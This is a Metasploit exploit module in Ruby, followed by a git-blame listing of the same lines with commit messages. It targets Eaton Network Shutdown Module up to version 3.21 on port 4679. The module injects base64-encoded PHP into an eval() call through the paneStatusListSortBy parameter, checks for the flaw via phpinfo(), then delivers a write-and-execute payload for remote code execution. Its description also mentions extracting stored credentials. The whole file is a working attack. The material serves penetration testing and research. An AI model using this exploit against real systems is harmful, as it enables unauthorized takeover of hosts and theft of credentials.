modules/exploits/multi/http/eaton_nsm_code_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Shutdown Module (sort_values) Remote PHP Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in Eaton Network Shutdown Module
        version <= 3.21, in lib/dbtools.inc which uses unsanitized user input
        inside a eval() call. Additionally the base64 encoded user credentials
        are extracted from the database of the application. Please note that
        in order to be able to steal credentials, the vulnerable service must
        have at least one USV module (an entry in the "nodes" table in
        mgedb.db)
      },
      'Author'         =>
        [
          'h0ng10',  # original discovery, msf module
          'sinn3r'   # PhpEXE shizzle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83199'],
          ['URL', 'http://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000
        },
      'Platform'       => %w{ linux php },
      'Arch'           => ARCH_PHP,

      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => '2012-06-26'
    ))

    register_options(
      [
        Opt::RPORT(4679)
      ])
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code("phpinfo();die();")

    if not res or res.code != 200
      vprint_error("Failed: Error requesting page")
      return CheckCode::Unknown
    end

    return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
    return CheckCode::Safe
  end

  def execute_php_code(code, opts = {})
    param_name = rand_text_alpha(6)
    padding    = rand_text_alpha(6)
    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
        'uri'   =>  '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param,
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code),
          },
        'headers' =>
          {
            'Connection' => 'Close',
          }
      })
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?\>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

    execute_php_code(p)
    handler
  end
end
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`include Msf::Exploit::Remote::HttpClient`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`include Msf::Exploit::PhpEXE`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
Fix requires for PhpEXE 2013-06-19 16:27:54 -05:00			`'Name' => 'Network Shutdown Module (sort_values) Remote PHP Code Injection',`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`'Description' => %q{`
Fix requires for PhpEXE 2013-06-19 16:27:54 -05:00			`This module exploits a vulnerability in Eaton Network Shutdown Module`
			`version <= 3.21, in lib/dbtools.inc which uses unsanitized user input`
			`inside a eval() call. Additionally the base64 encoded user credentials`
			`are extracted from the database of the application. Please note that`
			`in order to be able to steal credentials, the vulnerable service must`
			`have at least one USV module (an entry in the "nodes" table in`
			`mgedb.db)`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`},`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`'Author' =>`
			`[`
			`'h0ng10', # original discovery, msf module`
			`'sinn3r' # PhpEXE shizzle`
			`],`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '83199'],`
Update broken secunia references 2023-03-23 10:19:30 +00:00			`['URL', 'http://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`],`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`'Space' => 4000`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`},`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux php },`
Strip the credential dumping stuff (making it auxiliary) 2012-11-28 14:27:01 -06:00			`'Arch' => ARCH_PHP,`
Retab modules 2013-08-30 16:28:54 -05:00
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`'Targets' =>`
			`[`
			`[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],`
			`[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]`
			`],`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`'DefaultTarget' => 0,`
Strip the credential dumping stuff (making it auxiliary) 2012-11-28 14:27:01 -06:00			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-06-26'`
Strip the credential dumping stuff (making it auxiliary) 2012-11-28 14:27:01 -06:00			`))`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`register_options(`
			`[`
Strip the credential dumping stuff (making it auxiliary) 2012-11-28 14:27:01 -06:00			`Opt::RPORT(4679)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`def check`
			`# we use a call to phpinfo() for verification`
			`res = execute_php_code("phpinfo();die();")`
Retab modules 2013-08-30 16:28:54 -05:00
Code clean up, thanks to Brandon Perry 2012-11-28 01:20:41 -05:00			`if not res or res.code != 200`
Saving progress 2014-01-21 14:10:35 -06:00			`vprint_error("Failed: Error requesting page")`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`return CheckCode::Unknown`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)`
			`return CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`def execute_php_code(code, opts = {})`
			`param_name = rand_text_alpha(6)`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`padding = rand_text_alpha(6)`
			`url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`res = send_request_cgi(`
			`{`
			`'uri' => '/view_list.php',`
			`'method' => 'POST',`
			`'vars_get' =>`
			`{`
			`'paneStatusListSortBy' => url_param,`
			`},`
			`'vars_post' =>`
			`{`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`param_name => Rex::Text.encode_base64(code),`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`},`
			`'headers' =>`
			`{`
			`'Connection' => 'Close',`
			`}`
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`})`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`def no_php_tags(p)`
			`p = p.gsub(/^<\?php /, '')`
			`p.gsub(/ \?\>$/, '')`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`def exploit`
Strip the credential dumping stuff (making it auxiliary) 2012-11-28 14:27:01 -06:00			`print_status("#{rhost}:#{rport} - Sending payload")`
Retab modules 2013-08-30 16:28:54 -05:00
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`unlink = (target['Platform'] == 'linux') ? true : false`
			`p = no_php_tags(get_write_exec_payload(:unlink_self => unlink))`
Retab modules 2013-08-30 16:28:54 -05:00
Use PhpEXE to be able to support PHP and Linux native payloads 2012-11-28 15:06:39 -06:00			`execute_php_code(p)`
added exploit for OSVDB 83199 2012-11-27 12:29:10 -05:00			`handler`
			`end`
			`end`